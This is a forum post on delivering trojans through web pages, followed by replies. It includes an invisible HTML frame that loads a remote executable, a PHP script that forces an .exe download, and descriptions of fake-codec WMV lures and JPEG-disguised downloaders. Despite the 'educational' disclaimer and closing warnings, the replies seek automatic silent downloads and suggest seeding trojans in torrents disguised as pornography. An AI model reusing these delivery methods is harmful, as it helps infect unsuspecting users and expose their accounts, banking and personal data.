Before i start writing this small article i want to say that the presented information is for educational purposes and by no means Go4expert or myself takes any responsability for any misuse of the information and mentioned tools. However,i must say there are plenty more tactics,tools and tricks. Simply by using a php file,you can use it as a trojan/malware downloader. Iframe in HTML Method Example of this is: HTML: <html><head><title> </title></head><frameset rows="0,*"> <frame src="http://webisite.com/CALC.EXE" name="top_frame" frameborder="0" scrolling="no" noresize="noresize" marginheight="0" marginwidth="0"/> <noframes></body></noframes></frameset></html> Note CALC>exe (that would be the trojan) ========================================================== Octect/sockets en PHP Method With a php file you can use a short script to call your .exe file and ask for the download. Note that the PHP file and the EXE file must be in the same path,or you can also modify the path in the $flnm="file.exe" Example: PHP: <?php $flnm = "archive.exe"; $size = filesize($flnm); $fp = fopen($flnm, "r"); $src = fread($fp, $size); fclose($fp); header("Accept-Ranges: bytes\r\n"); header("Content-Length: ".$size."\r\n"); header("Content-Disposition: inline; filename=".$flnm); header("\r\n"); header("Content-Type: application/octet-stream\r\n\r\n"); echo $src; ?> ========================================================== WMV With URLANDEXIT This Method is very popular this days.Nowadays you can spread malware by uploading tricked wmv files to limewire/ares and other file/moviews shared sites. With tools like the one shown below you can edit the wmv file to set up a stop time on the file and ask a user to download a fake codec. If you look closely,when the innocent user tries to watch the movie clip,it will show them a message asking for the download. Please see the picture below for a better idea. ========================================================== Be aware of your settings in your pc, do not download anything from a website you don't trust. Below is a picture of an old downloader that used the exploit on old IE/windos This Tool will create a downloader with an extension Jpeg including the picture icon ========================================================== The same exploits were used and were very popular couple of years back using a Html downloader. Please see below for a picture so you can have a better idea. ========================================================== These has been some of the most popular tools used time ago. Obviously and as you should be aware;the techniques are getting more sophisticated by the day. On purpose i have not mentioned any of the websites where you can download this tools. Researching is the most accurate way to be uptodate on this bad intentioned people tactics to make innocent internet users get inffected. Why would a hacker/script kiddie go thru all this programs and set up websites? It is very simple,once you get inffected with a RAT( remote Administration tools) they have complete access to your computer. All your most personal information is exposed to them. And......they can use your pc as a zombie to atack other sites via DDOS. Also understand that even with a simple Keylogger( keystroke Recorder) they could access all your emails,all your online banking sites,paypal and lots of your personal info. I hope this article was interesting for you. I am recovering at this moment from a very serious surgery,so please don't message me trying to get links for downloading this tools. P455w0rd_Cr4kz
thanks for the info man, imo its always good to learn about how these tech were used in order to prevent them happening from you and they really are good for educational purpose's!
1 question in that php script if we include any exe file, will user be prompted to download it? is there any way for auto downloader??
other way i cud suggest is put ur trojan and pack it in a torrent! put something good like aishwarya rai's xxx and all.. u get 1000s of downloads a day... and ur ftp is blown out because of logs :P